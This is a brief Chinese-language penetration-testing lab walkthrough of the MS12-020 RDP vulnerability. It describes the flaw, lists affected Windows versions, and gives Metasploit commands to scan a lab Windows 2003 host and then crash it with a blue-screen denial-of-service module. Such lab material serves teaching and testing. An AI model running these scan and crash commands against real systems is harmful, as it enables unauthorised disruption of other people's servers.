[漏洞说明]:
MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,可导致BSOD(死亡蓝屏)
介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。 然后控制系统。
受影响系统:
开了RDP的
Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows 7
环境:
攻击机kali 192.168.115.28
靶机windows 2003 server 192.168.115.21
扫描是否存在此漏洞
search ms12
use auxiliary/scanner/rdp/ms12_020_check
set RHOSTS 192.168.115.21
run
死亡蓝屏攻击
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set RHOSTS 192.168.115.21
run
